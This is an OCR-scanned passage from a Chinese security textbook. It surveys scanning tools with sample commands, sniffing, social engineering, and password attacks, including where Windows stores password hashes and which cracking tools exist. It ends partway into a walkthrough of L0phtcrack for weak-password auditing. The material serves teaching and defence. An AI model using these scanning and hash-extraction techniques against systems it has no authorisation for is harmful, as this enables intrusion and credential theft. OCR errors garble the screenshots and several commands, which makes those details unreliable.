(1) netenum fping。netenum fping 是 一 个 很 好 用 的 IP 段 生成 工具 ,可 以 用 来 查看 有 
哪些 主机 在 线 , 用 来 进行 IP 段 扫描 。 

常用 命令 格式 : 


netenum + 网 络 号 /前 级 
fping -g + 网 络 号 /前 组 
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例如 : 


netenum 123.58.180.0/24 
fping —g 123.58.180.0/24 


(2) Nmap。Nmap 是 一 款 开 放 源 代码 的 网 络 探测 和 安全 审核 的 工具 , 它 可 以 检测 出 操 
作 系 统 的 版 本 号 。 最 初 它 只 是 一 个 著名 的 黑客 工具 ,但 很 快 得 到 安全 工程 师 的 青睐 ,成 为 著 
名 的 网 络 安全 漏洞 的 检测 工具 。 

Nmap 是 在 免费 软件 基金 会 的 GNU General Public License (GPL ) 下 发 布 的 ,可 从 
www. insecure. org/nmap 站 点 上 免费 下 载 。 下 载 格式 可 以 是 tgz 格式 的 源码 或 RPM 格 
式 。 此 外 ,还 有 用 于 NT 环境 的 版 本 NmapNT, 但 功能 相对 弱 一 点 。Nmap 也 有 Linux 和 
Mac 版 本 。 

Nmap 的 设计 目标 是 快速 地 扫描 大 型 网 络 ,当然 用 它 扫 描 单个 主机 也 没有 问题 。Nmap 
以 新 颖 的 方式 使 用 原始 IP 报 文 来 发 现 网 络 上 有 哪些 主机 ,那些 主机 提供 什么 服务 (应 用 程 
序 名 和 版 本 ) ,那些 服务 运行 在 什么 操作 系统 (包括 版 本 信息 ) ,它们 使 用 什么 类 型 的 报 文 过 
滤器 /防火 墙 ,以 及 一 堆 其 他 功能 。 虽 然 Nmap 通常 用 于 安全 审核 ,许多 系统 管理 员 和 网 络 
管理 员 也 用 它 来 做 一 些 日 常 的 工作 ,如 查看 整个 网 络 的 信息 ,管理 服务 升级 计划 ,以 及 监视 
主机 和 服务 的 运行 。 

Nmap 输出 的 是 扫描 目标 的 列表 ,以 及 每 个 目标 的 补充 信息 ,至 于 是 哪些 信息 则 依赖 于 
所 使 用 的 选项 。“ 所 感 兴趣 的 端口 表格 "是 其 中 的 关键 。 那 张 表 列 出 端口 号 协议、 服务 名 称 
和 状态 。 状 态 可 能 是 open( 开 放 的 ) ,filtered( 被 过 滤 的 )、closed (关闭 的 ) 或 unfiltered( 未 
被 过 滤 的 ) 。open 意味 着 目标 机 器 上 的 应 用 程序 正在 该 端口 监听 连接 / 报 文 。filtered 意味 
着 防火 墙 . 过 滤器 或 者 其 他 网 络 障碍 阻止 了 该 端口 被 访问 ,Nmap 无 法 得 知 它 是 open 还 是 
closed。closed 端口 没有 应 用 程序 在 它 上 面 监听 ,但 是 它们 随时 可 能 开放 。 当 端口 对 Nmap 
的 探测 做 出 响应 ,但 是 Nmap 无 法 确定 它们 是 关闭 还 是 开放 时 ,这 些 端口 就 被 认为 是 
unfiltered ,如果 Nmap 报告 状态 组 合 open|filtered 和 closed|filtered, 则 说 明 Nmap 无 法 确 
定 该 端口 处 于 两 个 状态 中 的 哪 一 个 状态 。 当 要 求 进行 版 本 探测 时 ,端口 表 也 可 以 包含 软件 
的 版 本 信息 。 当 要 求 进行 IP 协议 扫描 时 (-sO) ,Nmap 提供 关于 所 支持 的 IP 协议 而 不 是 正 
在 监听 的 端口 的 信息 。 

除了 所 感 兴趣 的 端口 表 , Nmap 还 能 提供 关于 目标 机 的 进一步 信息 ,包括 反 向 域名 、 操 
作 系 统 猜测 、 设 备 类 型 和 MAC 地址 。 

(3) Superscan。Superscan 是 一 个 功能 强大 的 端口 扫描 工具 , 它 可 以 通过 Ping 来 检验 
目标 计算 机 是 否 在 线 , 支 持 IP 和 域名 相互 转换 ,还 可 以 检验 一 定 范 围 内 目标 计算 机 的 端口 
情况 和 提供 的 服务 类 别 。Superscan 可 以 自 定义 要 检验 的 端口 .并 可 以 保存 为 端口 列表 文 
件 , 它 还 自 带 了 一 个 木马 端口 列表 ,通过 这 个 列表 可 以 检测 目标 计算 机 是 否 有 木马 ,同时 用 
户 也 可 以 自己 定义 ,修改 这 个 木马 端口 列表 。 在 Superscan 找到 的 主机 上 , 单 击 右键 可 以 实 
现 HTTP 浏览 .Telnet 登录 FTP 上 传 .域名 查询 等 功能 。 

(4) X-Scan。X-Scan 是 由 安全 焦点 开发 的 完全 免费 的 漏洞 扫描 软件 ,采用 多 线程 方式 
对 指定 IP 地 址 或 了 P 地 址 范围 进行 漏洞 扫描 。 扫 描 内 容 包 括 远程 服务 类 型 .操作 系统 类 型 及 
版 本 、 各 种 弱 口 令 漏 洞 \. 后 门 、 应 用 服务 漏洞 .网 络 设 备 漏洞 .拒绝 服务 漏洞 等 二 十 几 个 大 类 .。 
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(5) ARPing。ARPing 用 于 探测 MAC 地 址 (借助 ARP 协议 ) 。 常 用 命令 格式 : 
RRPing + ip 地 址 


例如 ,ARPing 123. 58. 180. 29。 
(6) Netdiscover。Netdiscover 用 于 探测 内 网 信息 ,是 一 个 主动 /被 动 的 ARP 侦察 工 
具 。 常 用 命令 格式 : 


netdiscover 


(7) dmitry。dmitry 用 于 获取 目标 详细 信息 ,可 以 收集 关于 主机 的 很 多 信息 ,包括 
whois、tcp port 等 。 常 用 命令 格式 : 


dmitry -i+ ip 地 址 


例如 ,dmitry -i 123. 58. 180。 

(8) WAF。WAF 用 于 对 防护 措施 的 探测 ,用 于 检测 网 络 服务 器 是 否 处 于 网 络 应 用 的 
防火 墙 (Web Application Firewall, WAF) 保 护 状态 。 不 仅 可 以 发 展 测试 战略 ,而 且 能 够 开 
发 绕 过 网 络 应 用 防火 墙 的 高 级 技术 。 

【 例 5-3】 使 用 Nmap 扫描 漏洞 。 

(1) 双击 Nmap-Zenmap GUI. exe 启动 Nmap, 显 示 主 界面 如 图 5-3 所 示 。 


(2) 对 扫描 范围 进行 设置 ,在 “目标 ?文本 框 输入 检测 范围 ,可 以 设置 一 台 主 机 地 址 、 域 
名 ,也 可 以 设置 一 部 分 主机 地 址 。 本 例 选 择 地 址 范围 为 *192. 168. 1.0/24”。 在 “配置 "文本 
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框 中 输入 扫描 参数 配置 ,可 以 在 下 拉 列 表 中 选择 ,如 图 5-4 所 示 。 


Er aaaal 


图 5-4 ”扫描 参数 设置 一 检测 范围 
(3) 开始 对 目标 范围 主机 进行 扫描 ,如 图 5-5 所 示 。 


192 168.1.0124 


[msp -T4 -A ~v 192 166.1.0124 


B88/tcp on 192.168.1.102 
5B/tcp on 192.168.1.1 
3386/tcp on 192.168.1.102 


port 135/tcp on 192.168.. 
port 135/tcp on 192.168.1.109 
port 3389/tcp on 192.168.1.109 
port 1025/tcp on 192.168.1.103 
port 49158/tcp on 192.168.1.102 
port 1928/tcp on 192.168.1.103 
port 49152/tcp on 192.168.1.109 
port 49152/tcp on 192.168.1.1 
port 49152/tcp on 192 102 
port 1433/tcp on 192.168.1.102 
port 1826/tcp on 192.168.1.103 
port 1829/tcp on 192.168.1.103 
port 49154/tcp on 192.168.1.109 
port 49154/tcp on 192.168.1.102 
port 8882/tcp on 192.168.1.103 
port 1827/tcp on 192.168.1.103 
port 8869/tcp on 192.168.1.102 
port 962/tcp on 192.168.1.193 
port 982/tcp on 192.168.1.109 
port 982/tcp on 192.168-1-192 
port 962/tcp on 192.168.1.198 
port 1931/tcp on 192.168.1.103 
port 49157/tcp on 192.168.1.109 
port 1988/tcp_on 192.168.1.1 


图 5-5 Nmap 扫描 进行 页 面 
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(4) 对 域名 主机 进行 扫描 ,如 图 5-6 所 示 。 


me 加 到 | 而 | 


a 


nmap -74 


AV www Sina com cn ] as 


|starting Nmap 7.48 ( https://nmap.org ) at 2917-12-61 
34 3?D1HEzEx3E+33 
Loaded 143 scripts for scanning- 
ing- 


Discovered open port 443/tcp on etn 
Discovered open port 88/tcp on 125.211.213.126 
Discovered open port 1935/tcp on 125.211.213.126 


leted SYN Stealth Scan at 13:34, 1.99s elapsed 


(1888 total ports) 
Fnitiating Service scan at 13:34 


图 5-6 Nmap 域名 主机 扫描 进行 页 面 
(5) 扫描 结束 后 ,可 以 在 各 标签 页 查看 扫描 报告 ,如 图 5-7 所 示 。 


ierosoft-ds 
sbt-server 
marpe 
natbios-ssn 
Deanyvheredate 


filtered 


Eiltered 
filtered 

pe 

Eiltered wsrpe 
lterea aathios-ssn 
Eiltered amp 

open https 
Eiltered sier 


Eiltered httrrpe-epmep 
Eiltered reme 

open rtp 

Eiltered sassbt-server 
filtered jat524 
Eiltered pewywheredats 
Eiltered me 


图 5-7 X-Scan 扫描 报告 页 面 
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5.2.3 网 络 监听 


网 络 监听 是 指 通 过 截获 他 人 网 络 上 通信 的 数据 流 ,并 非法 从 中 提取 重要 信息 的 一 种 方 
法 。 网 络 监 听 是 主机 的 一 种 工作 模式 ,在 这 种 模式 下 ,主机 可 以 接收 到 本 网 络 段 在 同一 物理 
通道 上 传输 的 所 有 信息 ,而 不 管 这 些 信 息 的 发 送 方 和 接收 方 是 谁 ,而 攻击 者 极 可 能 在 两 端 进 
行 数据 的 监听 。 此 时 车 两 台 主 机 进行 数据 通信 的 信息 没有 加 密 , 只 使 用 网 络 监听 工具 就 可 
以 轻而易举 地 截取 包括 账号 在 内 的 信息 资料 ,虽然 网 络 监听 获得 的 用 户 账户 和 口令 有 一 定 
的 局 限 性 ,但 是 监听 者 往往 能 够 获得 其 所 在 网 络 的 所 有 用 户 的 账户 和 口令 。 

网 络 监听 的 目的 是 截获 通信 的 内 容 , 监 听 的 手段 是 对 协议 进行 分 析 。 利 用 现 有 网 络 
协议 的 一 些 漏洞 来 实现 ,不 直接 对 受害 主机 系统 的 整体 性 进行 任何 操作 或 破坏 。 网 络 窃 
听 只 对 受害 主机 发 出 的 数据 流 进行 操作 ,不 与 主机 交换 信息 ,也 不 影响 受害 主机 的 正常 
通信 。 

Sniffer Pro 就 是 一 个 完善 的 网 络 监听 工具 。 

监听 器 Sniffer 的 原理 : 在 局 域 网 中 与 其 他 计算 机 进行 数据 交换 的 时 候 ,发 送 的 数据 包 
发 往 所 有 的 连 在 一 起 的 主机 ,也 就 是 广播 ,在 报头 中 包含 目标 机 的 正确 地 址 。 因 此 只 有 与 数 
据 包 中 目标 地 址 一 致 的 那 台 主机 才 会 接收 数据 包 , 其 他 的 机 器 都 会 将 包 丢 弃 。 但 是 ,当主 机 
工作 在 监听 模式 下 时 ,无 论 接 收 到 的 数据 包 中 目标 地 址 是 什么 ,主机 都 将 其 接收 下 来 。 然 后 
对 数据 包 进行 分 析 ,就 得 到 了 局 域 网 中 通信 的 数据 。 一 台 计算 机 可 以 监听 同一 网 段 所 有 的 
数据 包 , 不 能 监听 不 同 网 段 的 计算 机 传输 的 信息 。 

防止 监听 的 手段 是 : 建设 交换 网 络 \ 使 用 加 密 技术 和 使 用 一 次 性 口令 技术 。 

除了 监听 软件 Sniffer Pro 以 外 ,还 有 以 下 一 些 常 用 的 监听 软件 。 

(1) 嗅 探 经 典 一 一 Iris 。 

(2) 密码 监听 工具 一 一 Win Sniffer。 

(3) 密码 监听 工具 一 一 pswmonitor 和 非 交 换 环 境 局 域 网 的 fssniffer 等 。 

Sniffer Pro 是 一 款 一 流 的 监听 工具 ,但 是 Sniffer Pro 不 能 有 效 地 提取 有 效 信息 。 


5.3 网 络 人 侵 


5.3.1 社会 工程 学 攻击 


社会 工程 是 使 用 计谋 和 假 情报 去 获得 密码 和 其 他 敏感 信息 的 科学 ,研究 一 个 站 点 的 策 
咯 其 中 之 一 就 是 尽 可 能 多 地 了 解 这 个 组 织 的 个 体 ,因此 黑客 不 断 试 图 寻找 更 加 精妙 的 方法 
从 他 们 希望 渗透 的 组 织 那 里 获得 信息 。 

社会 工程 学 攻击 通常 是 利用 大 众 的 朴 于 防范 的 诡计 ,让 受害 者 掉 和 陷阱。 该 技巧 通常 
以 交谈 ,欺骗 .假冒 或 口语 用 字 等 方式 ,从 合法 用 户 中 套 取 敏感 的 信息 。 

例如 ,在 2003 年 6 月 初 ,一 些 在 中 国 工商 银行 进行 过 网 上 银行 注册 的 客户 收 到 了 一 封 
来 自 网 络 管理 员 的 电子 邮件 ,宣称 由 于 网 络 银 行 系统 升级 ,要 求 客户 重新 填写 用 户 名 和 密 
码 。 这 一 举动 随后 被 工行 工作 人 员 发 现 ,经 证 实 是 不 法 分 子 骨 用 网 站 公开 信箱 ,企图 窃取 客 
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户 的 资料 。 虽 然 没 有 造成 多 大 的 损失 ,但 是 这 宗 典 型 的 电子 邮件 欺骗 案例 当时 曾 在 国内 安 
全 界 和 金融 界 掀起 了 轩然大波 ,刺激 人 们 针对 信息 安全 问题 展开 了 更 加 深切 的 讨论 。 

目前 社会 工程 学 攻击 主要 包括 两 种 方式 : 打 电话 请 求 密码 和 伪造 E-mail。 

1. 打 电 话 请 求 密码 

尽管 不 像 前 面 讨 论 的 策略 那样 聪明 , 打 电 话 询问 密码 也 经 常 奏效 。 在 社会 工程 中 那些 
黑客 冒充 失去 密码 的 合法 雇员 ,经常 通过 这 种 简单 的 方法 重新 获得 密码 。 

2. 伪造 E-mail 

使 用 Telnet 一 个 黑客 可 以 截取 任何 一 个 身份 证 发 送 E-mail 的 全 部 信息 ,这 样 的 E-mail 
消息 是 真 的 ,因为 它 发 自 一 个 合法 的 用 户 ,在 这 种 情形 下 这 些 信 息 显 得 是 绝对 的 真实 ,黑客 
可 以 伪造 这 些 。 一 个 冒充 系统 管理 员 或 经 理 的 黑客 就 能 较为 轻松 地 获得 大 量 的 信息 ,黑客 
就 能 实施 他 们 的 恶意 阴谋 。 


5.3.2 口令 攻击 


口令 认证 是 身份 认证 的 一 种 手段 。 认 证 过 程 可 以 是 用 户 对 主机 ,也 可 以 是 一 台 计 算 机 
向 另 一 台 计 算 机 通过 网 络 发 送 请 求 。 基 于 口令 认证 是 较为 常见 的 一 种 形式 。 

攻击 者 攻击 目标 时 常常 把 破译 用 户 的 口令 作为 攻击 的 开始 。 只 要 攻击 者 能 猜测 或 者 确 
定 用 户 的 口令 ,他 就 能 获得 机 器 或 者 网 络 的 访问 权 , 并 能 访问 到 用 户 能 访问 到 的 任何 资源 。 
如 果 这 个 用 户 有 域 管理 员 或 root 用 户 权 限 ,这 是 极其 危险 的 。 

口令 攻击 是 黑客 最 喜欢 采用 的 人 侵 网 络 的 方法 。 黑 客 通过 获取 系统 管理 员 或 其 他 特殊 
用 户 的 口令 ,获得 系统 的 管理 权 , 窃 取 系 统 信 息 、 磁 盘 中 的 文件 甚至 对 系统 进行 破坏 。 

这 种 方法 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 ,然后 青 进行 合法 用 户 
口令 的 破译 。 获 得 普通 用 户 账号 的 方法 很 多 ,例如 以 下 几 种 。 

利用 目标 主机 的 Finger 功能 : 当 用 Finger 命令 查询 时 ,主机 系统 会 将 保存 的 用 户 资料 
(如 用 户 名 .登录 时 间 等 ) 显 示 在 终端 或 计算 机 上 。 

利用 目标 主机 的 X. 500 服务 : 有 些 主机 没有 关闭 X. 500 的 目录 查询 服务 ,也 给 攻击 者 
提供 了 获得 信息 的 一 条 简易 途径 。 

从 电子 邮件 地 址 中 收集 : 有 些 用 户 电子 邮件 地 址 常会 透露 其 在 目标 主机 上 的 账号 ; 查 
看 主机 是 否 有 习惯 性 的 账号 :有 经 验 的 用 户 都 知道 ,很 多 系统 会 使 用 一 些 习 惯性 的 账号 , 造 
成 账号 的 泄露 。 

1. 口令 攻击 方法 

口令 攻击 的 方法 有 很 多 ,主要 有 以 下 3 种 。 

第 一 种 是 通过 网 络 监听 非法 得 到 用 户口 令 , 这 类 方法 有 一 定 的 局 限 性 ,但 危害 性 极 大 。 
监听 者 往往 采用 中 途 截 击 的 方法 ,也 是 获取 用 户 账户 和 密码 的 一 条 有 效 途 径 。 当 前 ,很 多 协 
议 根本 就 没有 采用 任何 加 密 或 身份 认证 技术 ,如 在 Telnet、.FTP、HTTP、SMTP 等 传输 协议 
中 ,用 户 账户 和 密码 信息 都 是 以 明文 格式 传输 的 ,此 时 若 攻 击 者 利用 数据 包 截取 工具 便 可 很 
容易 收集 到 用 户 的 账户 和 密码 。 还 有 一 种 中 途 截击 攻击 方法 , 它 在 用 户 同 服务 器 端 完 成 “三 
次 握手 ”建立 连接 之 后 ,在 通信 过 程 中 扮演 * 第 三 者 ”的 角色 ,假冒 服务 器 身份 欺骗 用 户 ,再 假 
冒 用 户 向 服务 器 发 出 恶意 请 求 ,其 造成 的 后 果 不 堪 设 想 。 另 外 ,攻击 者 有 时 还 会 利用 软件 和 
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硬件 工具 时 刻 监视 系统 主机 的 工作 ,等 待 记录 用 户 登 录 信 息 , 从 而 取得 用 户 密码 ; 或 者 编制 
有 缓冲 区 溢出 错误 的 SUID 程序 来 获得 超级 用 户 权 限 。 

第 二 种 是 在 知道 用 户 的 账号 后 (如 电子 邮件 @ 前 面 的 部 分 ) 利 用 一 些 专门 软件 强行 破解 
用 户口 令 , 这 种 方法 不 受 网 段 限制 ,但 攻击 者 要 有 足够 的 耐心 和 时 间 。 例 如 ,采用 字典 穷 举 
法 (或 称 暴 力 法 ) 来 破解 用 户 的 密码 。 攻 击 者 可 以 通过 一 些 工具 程序 ,自动 地 从 计算 机 字典 
中 取出 一 个 单词 ,作为 用 户 的 口令 ,再 输入 给 远 端 的 主机 ,申请 进入 系统 ; 若 口令 错误 ,就 按 
序 取出 下 一 个 单词 ,进行 下 一 个 尝试 ,并 一 直 循环 下 去 ,直到 找到 正确 的 口令 或 字典 的 单词 
试 完 为 止 。 由 于 这 个 破译 过 程 由 计算 机 程序 来 自动 完成 ,因而 短 时 间 就 可 以 把 上 十 万 条 记 
录 的 字典 里 所 有 单词 都 尝试 一 遍 。 

第 三 种 是 利用 系统 管理 员 的 失误 。 在 现代 的 UNIX 操作 系统 中 ,用 户 的 基本 信息 存放 
在 passwd 文件 中 ,而 所 有 的 口令 则 经 过 DES 加 密 方法 加 密 后 专门 存放 在 一 个 称 为 shadow 
的 文件 中 。 黑 客 们 获取 口令 文件 后 ,就 会 使 用 专门 的 破解 DES 加 密 法 的 程序 来 解 口令 。 同 
时 ,由 于 为 数 不 少 的 操作 系统 都 存在 许多 安全 漏洞 .Bug 或 一 些 其 他 设计 缺陷 ,这 些 缺 陷 一 
旦 被 找 出 ,黑客 就 可 以 长 驱 直 入 。 

2. 口令 攻击 技术 


具体 的 攻击 技术 主要 有 以 下 几 种 。 

1) 暴力 攻击 

从 技术 的 角度 来 说 ,口令 保护 的 关键 在 于 增加 攻击 者 破译 口令 所 付出 的 时 间 代 价 。 对 
于 固定 长 度 的 口令 ,在 足够 长 的 时 间 内 ,总 能 穷 举 出 其 全 部 可 能 的 取 值 。 如 果 有 足够 快 的 计 
算 机 能 尝试 字母 ,数字 ,特殊 字符 等 所 有 的 组 合 , 将 能 够 最 终 破解 出 所 有 的 口令 。 这 种 类 型 
的 攻击 方式 称 为 暴力 攻击 (强力 攻击 )。 

例如 ,一 个 由 4 个 小 写字 母 组 成 的 口令 可 以 在 几 分 钟 内 破解 (大 约 共 有 50 万 种 可 能 的 
组 合 ); 一 个 由 6 个 字符 ,包括 大 小 写 .数字 、 标 点、 特殊 字符 等 的 口令 (大 约 有 10 万 亿 种 可 
能 的 组 合 ) ,可 以 在 一 个 月 内 进行 破解 。 

2) 字典 攻击 

字典 攻击 是 将 一 些 常见 的 、 使 用 概率 较 高 的 口令 集中 存放 在 字典 文件 中 ,用 与 强力 攻击 
类 似 的 方法 进行 逐个 尝 

一 般 攻 击 者 都 有 自己 的 口令 字典 ,其 中 包括 常用 的 词 .词组 .数字 及 其 组 合 等 ,并 在 攻击 
过 程 中 不 断 地 充实 丰富 自己 的 字典 库 ,攻击 者 之 间 也 经 常会 交换 各 自 的 字典 库 。 使 用 一 部 
1 万 个 单词 的 词典 一 般 能 猜 出 系统 中 70% 的 口令 。 

对 付 字典 攻击 最 有 效 的 方法 就 是 设置 合适 的 口令 ,强烈 建议 不 要 使 用 自己 的 名 字 或 简 
单 的 单词 作为 自己 的 口令 。 目 前 很 多 应 用 系统 都 对 用 户 输 入 的 口令 进行 强度 检测 ,如 果 输 
入 了 一 个 弱 口 令 , 则 系统 会 向 用 户 警告 提示 。 

3) 组 合 攻击 

字典 攻击 只 能 发 现 字典 里 存在 的 单词 口令 ,但 速度 很 快 。 强 力 攻击 能 发 现 所 有 的 口令 ， 
但 是 破解 时 间 很 长 。 鉴 于 许多 管理 员 要 求 用 户 使 用 字母 和 数字 ,用 户 的 对 策 是 在 口令 后 面 
添加 几 个 数字 ,如 把 口令 ericgolf 变 成 ericgolf55。 

有 人 认为 攻击 者 需要 使 用 强力 攻击 ,实际 上 可 以 使 用 组 合 攻击 的 方法 ,即使 用 字典 单词 
在 尾部 串 接任 意 个 字母 或 数字 。 这 种 攻击 介 于 字典 攻击 和 强力 攻击 之 间 ,攻击 效果 显著 。 


4) 针对 口令 存储 的 攻击 
通常 ,系统 为 了 验证 的 需要 ,都 会 将 口令 以 明文 或 者 密 文 的 方式 存放 在 系统 中 。 对 于 攻 
击 者 来 说 ,如 果 能 够 远程 控制 或 者 本 地 操作 目标 主机 ,那么 通过 一 些 技术 手段 就 可 以 获取 到 
这 些 口令 的 明文 ,这 就 是 针对 口令 存储 的 攻击 。 
不 同系 统 口令 的 存储 位 置 不 同 , 另 外 ,在 身份 验证 程序 运行 的 时 候 , 还 会 将 口令 或 口令 
的 密 文 加 载 到 内 存 中 。 因 此 ,口令 攻击 包括 对 缓存 口令 的 攻击 、 对 口令 文件 的 攻击 和 其 他 存 
储 位 置 的 口令 攻击 等 。 | 
(1) 针对 口令 文件 的 攻击 。 文 件 是 口令 存储 的 一 种 -一 -一 
hp 工具 0) 帮助 0 
常见 形式 , 如 Windows 中 的 SAM 文件 , Linux 中 的 区 了 夫 


shadow 文件 。 很 多 使 用 ASP 构建 的 网 站 ,在 其 源 代 码 文 [ER 
件 中 往往 以 明文 形式 存放 连接 数据 库 的 账号 和 口令 ,一旦 生 


攻击 侵入 网 站 服务 器 ,就 可 以 进一步 获取 后 台数 据 库 服务 
器 的 账号 和 口令 。 其 他 的 一 些 应 用 程序 ,如 Foxmail, 它 
将 用 户 的 邮箱 口令 存放 在 相应 账号 目录 下 的 account. stg 
文件 中 ,有 专门 的 工具 可 以 破解 该 文件 ,如 月 影 Foxmail 
邮件 转换 /密码 恢复 器 1.7 。 

(2) Windows 系统 账号 口令 攻击 。 操 作 系 统一 般 不 
存储 明文 口令 ,而 只 保存 口令 散 列 。 在 Windows 系统 中 ， 
可 以 在 以 下 几 个 位 置 中 找到 存储 的 口令 散 列 。 


BM systenprofile 

Br 

Bb BcD-Tenplate 

AB] BCD-Tenplate LDG 

上] COMPONENTS 

到 COMPONENTS. LDG 

BQ) COMPONENTS. LDG1 

AB) COMPONENTS. LDG2 

A COMPONENTS {016886b9-6c6E-11de-8dld. 
A COMPONENTS {O16868b9-6cBE-11de-8dld. 
及 COMPONENTS {016888b9-BcBE-11de-8d1d. 


@ 注册 表 , 位置 在 HKEY_LOCAL_MACHINE\ | 站 ma 
SAMNSAM。 AB) DEFAVLT. LOcl 


A ) DEFAVLT. LOG2 


@ SAM 文件 ,system32\config\SAM, 如 图 5-8 所 示 。 sh 

@ 恢复 盘 , 位 置 在 repair。 A S106 

@ 某 些 系 统 进程 的 内 存 中 。 图 5-8 SAM 文件 位 置 

在 SAM 文件 中 保存 的 不 是 口令 的 明文 ,而 是 经 过 加 
密 算法 处 理 后 的 结果 。Windows 使 用 两 种 算法 来 处 理 明文 口令 , 即 早期 的 LM 算法 和 更 为 
安全 的 NTLM 算法 。 

LM 算法 : 对 数字 串 KGS! @#$%% 进 行 DES 加 密 。 

NTLM 算法 : 先 把 口令 变 成 Unicode 编码 ,然后 使 用 md4 进行 Hash 运算 。 

Windows 的 口令 破解 : 可 以 利用 LOphtcrack 进行 。 在 一 台 高 端 PC 上 ,对 于 有 效 的 
LM hash ,可 以 在 5. 5 小 时 内 破解 字母 -数字 口令 ; 45 小 时 破解 字母 .数字 和 部 分 符号 口令 ， 
480 小 时 破解 字母 数字、 全 部 符号 口令 。 

3. 口令 破解 工具 

(1) LOphtcrack。LOphtcrack 是 一 个 NT 口令 审计 工具 ,能 根据 操作 系统 中 存储 的 加 
密 哈 希 计 算 NT 口令 ,功能 非常 强大 ,丰富 ,是 目前 市 面 上 最 好 的 LOphtcrack 口令 破解 程序 
之 一 。 它 有 3 种 方式 可 以 破解 口令 : 词典 攻击 、 组 合 攻 击 、 强 行 攻击 。LO0phtcrack 不 仅 有 一 
个 美观 、 容 易 使 用 的 GUI, 而且 利 用 了 NT 的 两 个 实际 缺陷 ,这 使 得 LOphtcrack 速度 很 快 。 

(2) NTSweep。NTSweep 使 用 的 方法 和 其 他 口令 破解 程序 不 同 , 它 不 是 下 载 口令 并 离 
线 破解 ,NTSweep 是 利用 了 Microsoft 允许 用 户 改变 口令 的 机 制 。NTSweep 首先 取 定 一 
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个 单词 ,再 使 用 这 个 单词 作为 账号 的 原始 口令 并 试图 把 用 户 的 口令 改 为 同一 个 单词 。 如 果 
主 域 控制 机 器 返回 失败 信息 ,就 可 知道 这 不 是 原来 的 口令 。 反 之 如 果 返 回 成 功 信息 ,就 说 明 
这 一 定 是 账号 的 口令 。 因 为 成 功 地 把 口令 改 成 原来 的 值 ,用 户 永 远 不 会 知道 口令 曾经 被 人 
修改 过 。NTSweep 可 从 www. packet. securify. com 下 载 。 

NTSweep 非常 有 用 ,因为 它 能 通过 防火 墙 ,也 不 需要 任何 特殊 权限 来 运行 。 但 是 也 有 
缺点 ,首先 ,运行 起 来 较 慢 ; 其 次 ,尝试 修改 口令 并 失败 的 信息 会 被 记录 下 来 ,被 管理 员 检 测 
到 ; 最 后 ,使 用 这 种 技术 的 猜测 程序 不 会 给 出 精确 信息 ,如 有 些 情况 不 准 用 户 更 改口 令 ,这 
时 程序 会 返回 失败 信息 ,即使 口令 是 正确 的 。 

(3) NTCrack。NTCrack 是 UNIX 破解 程序 的 一 部 分 ,但 是 在 NT 环境 下 破解 。 
NTCrack 与 UNIX 中 的 破解 类 似 , 但 是 NTCrack 在 功能 上 非常 有 限 , 它 不 像 其 他 程序 一 样 
提取 口令 喻 希 , 它 和 NTSweep 的 工作 原理 类 似 ,必须 给 NTCrack 一 个 user id 和 要 测试 的 
口令 组 合 ,然后 程序 会 告诉 用 户 是 否 成 功 。 

(4) PWDump2。PWDump2 不 是 一 个 口令 破解 程序 ,但 是 它 能 用 来 从 SAM 数据 库 中 
提取 哈 希 口令 。LOphtcrack 已 经 内 建 了 这 个 特征 ,但 是 PWDump2 还 是 很 有 用 的 。 首 先 ， 
它 是 一 个 小 型 的 、 易 使 用 的 命令 行 工具 ,能 提取 口令 哈 希 : 其 次 ,目前 很 多 情况 下 
LOphtcrack 的 版 本 不 能 提取 哈 希 口令 ,如 SYSTEM 是 一 个 能 在 NT 下 运行 的 程序 ,为 
SAM 数据 库 提供 了 很 强 的 加 密 功 能 ,如 果 SYSTEM 在 使 用 ,LOphtcrack 就 无 法 提取 喻 希 
口令 ,但 是 PWDump2 还 能 使 用 ; 而 且 要 在 Windows 2000 下 提取 喻 希 口令 ,必须 使 用 
PWDump2, 因 为 系统 使 用 了 更 强 的 加 密 模式 来 保护 信息 。 

(5) Crack。Crack 是 一 个 旨 在 快速 定位 UNIX 口令 弱点 的 口令 破解 程序 。Crack 使 用 
标准 的 猜测 技术 确定 口令 , 它 检 查 口 令 是 否 为 如 下 情况 之 一 : 和 user id 相同 ,单词 
password 数字 串 .字母 串 。Crack 通过 加 密 一 长 串 可 能 的 口令 ,并 把 结果 和 用 户 的 加 密 口 
令 相 比 较 ,看 其 是 否 匹 配 。 用 户 的 加 密 口令 必须 是 在 运行 破解 程序 之 前 就 已 经 提供 的 。 

(6) John the Ripper。UNIX 口令 破解 程序 ,但 也 能 在 Windows 平台 运行 ,功能 强大 ， 
运行 速度 快 ,可 进行 字典 攻击 和 强行 攻击 。 

(7) XIT。XIT 是 一 个 执行 词典 攻击 的 UNIX 口令 破解 程序 。XIT 的 功能 有 限 , 因 为 
它 只 能 运行 词典 攻击 ,但 程序 很 小 ,运行 很 快 。 

(8) Slurpie。Slurpie 能 执行 词典 攻击 和 定制 的 强行 攻击 ,要 规定 所 需要 使 用 的 字符 数 
目 和 字符 类 型 ,如 可 以 能 够 Slurpie 发 起 一 次 攻击 ,使 用 7 字符 或 8 字符、 仅 使 用 小 写字 母 口 
令 进 行 强行 攻击 。 

和 John、Crack 相 比 ,Slurpie 最 大 的 优点 是 它 能 分 布 运 行 ,Slurpie 能 把 几 台 计算 机 组 成 
一 台 分 布 式 虚拟 机 器 在 很 短 的 时 间 里 完成 破解 任务 。 

【 例 5-4】 使 用 LOphtcrack 检测 Windows 弱 口令 。 

LOphtcrack 是 一 款 网 络 管理 员 必 备 的 工具 , 它 可 以 用 来 检测 Windows、UNIX 用 户 是 
否 使 用 了 不 安全 的 密码 ,同样 也 是 最 好 、 最 快 的 Windows NT/2000/XP/UNIX 管理 员 账 号 
密码 破解 工具 。 

在 PC1 上 安装 LOphtcrack ,下载 最 新 版 的 LOphtcrack。 双 击 安装 程序 lc6setup ,安装 
LOphtcrack ,根据 提示 完成 安装 。 

使 用 LC6 检测 弱 口 令 。LC6 能 检测 Windows 和 UNIX/Linux 系统 用 户 的 口令 ,并 可 
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以 根据 需要 要 求 用 户 修改 密码 。 具 体 使 用 方法 如 下 。 
(1) 打开 LC6, 此 时 该 软件 会 弹出 一 个 向 导 框 ,可 跟随 向 导 完 成 检测 设置 ,如 图 5-9 所 示 。 


图 5-9 LC6 检测 设置 向 导 


(2) 单 击 Next 按钮 ,在 这 个 框 中 可 以 选择 用 于 检测 的 加 密 密 码 的 来 源 ,一 共有 4 种 。 
@ 本 机 注册 表 , 需 要 系统 管理 员 权限 。 

